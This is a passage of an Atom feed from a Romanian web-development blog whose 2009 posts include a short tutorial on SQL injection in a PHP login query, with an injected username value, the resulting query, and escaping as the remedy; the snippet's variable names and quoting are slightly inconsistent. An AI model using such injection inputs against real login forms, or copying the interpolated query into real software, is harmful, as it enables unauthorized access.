href='http://webbunch.blogspot.com/2009/05/ce-este-registerglobals.html#comment-form' title='3 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/8614406903425840010'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/8614406903425840010'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/05/ce-este-registerglobals.html' title='Ce este register_globals ?'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-8461000377151448684</id><published>2009-05-06T22:23:00.002+03:00</published><updated>2009-05-27T09:46:56.086+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='mysql'/><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='exemplu'/><title type='text'>Exemplu de SQL Injection</title><content type='html'>Exemplu de cod pentru logarea unui utilizator:&lt;br /&gt;&lt;br /&gt;$name = "sorin";&lt;br /&gt;$query = "SELECT * FROM user_table WHERE username = '$name'";&lt;br /&gt;&lt;br /&gt;// SQL Injecton&lt;br /&gt;// Daca in formularul de logare numele introdus este urmatorul&lt;br /&gt;$name_injected = "' OR 1'"&lt;br /&gt;&lt;br /&gt;// In modul neprotejat:&lt;br /&gt;&lt;br /&gt;$query_injected = "SELECT * FROM user_table WHERE username = '$name_bad'";&lt;br /&gt;Query ul va arata:&lt;br /&gt;SELECT * FROM user_table WHERE username = '' OR 1''&lt;br /&gt;&lt;br /&gt;Ceea ce va duce la o tentativa de logare incorecta.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;mysql_real_escape_string()&lt;br /&gt;Aceasta este solutia SQL pentru a "escapa"&lt;br /&gt;Concret adauga slash uri la valorile "escapate"&lt;br /&gt;&lt;br /&gt;$name_escaped = mysql_real_escape_string($name_bad);&lt;br /&gt;$query_escaped = "SELECT * FROM user_table WHERE username = '$name_escaped'";&lt;br /&gt;va arata:&lt;br /&gt;SELECT * FROM user_table WHERE username = \'\' OR 1\'\'&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-8461000377151448684?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/8461000377151448684/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/05/exemplu-de-sql-injection.html#comment-form' title='1 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/8461000377151448684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/8461000377151448684'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/05/exemplu-de-sql-injection.html' title='Exemplu de SQL Injection'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-7446550785796923314</id><published>2009-05-06T15:47:00.002+03:00</published><updated>2009-05-27T09:46:18.293+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='securitate'/><category scheme='http://www.blogger.com/atom/ns#' term='blog launch'/><category scheme='http://www.blogger.com/atom/ns#' term='internet'/><category scheme='http://www.blogger.com/atom/ns#' term='php'/><category scheme='http://www.blogger.com/atom/ns#' term='web'/><title type='text'>WEB Rullz!</title><content type='html'>No need to argue with that..&lt;br /&gt;A developer who once in his life did some&lt;br /&gt;programming in other platform then web probably feels the same.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-7446550785796923314?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/7446550785796923314/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/05/web-rullz.html#comment-form' title='1 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/7446550785796923314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/7446550785796923314'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/05/web-rullz.html' title='WEB Rullz!'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2981702222826239579.post-2046191247400842798</id><published>2009-05-06T15:39:00.000+03:00</published><updated>2009-05-06T17:49:11.862+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webbunch'/><category scheme='http://www.blogger.com/atom/ns#' term='php'/><category scheme='http://www.blogger.com/atom/ns#' term='web'/><title type='text'>We're a bunch!</title><content type='html'>WebBunch is launched!&lt;br /&gt;&lt;br /&gt;You can find various articles on PHP  MySql  web development,&lt;br /&gt;CMS s news, tutorials or HTML / CSS Javascript tricks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2981702222826239579-2046191247400842798?l=webbunch.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://webbunch.blogspot.com/feeds/2046191247400842798/comments/default' title='Postare comentarii'/><link rel='replies' type='text/html' href='http://webbunch.blogspot.com/2009/05/were-bunch.html#comment-form' title='0 comentarii'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/2046191247400842798'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2981702222826239579/posts/default/2046191247400842798'/><link rel='alternate' type='text/html' href='http://webbunch.blogspot.com/2009/05/were-bunch.html' title='We&apos;re a bunch!'/><author><name>Sorin Porumboiu</name><uri>http://www.blogger.com/profile/06211971910067219891</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
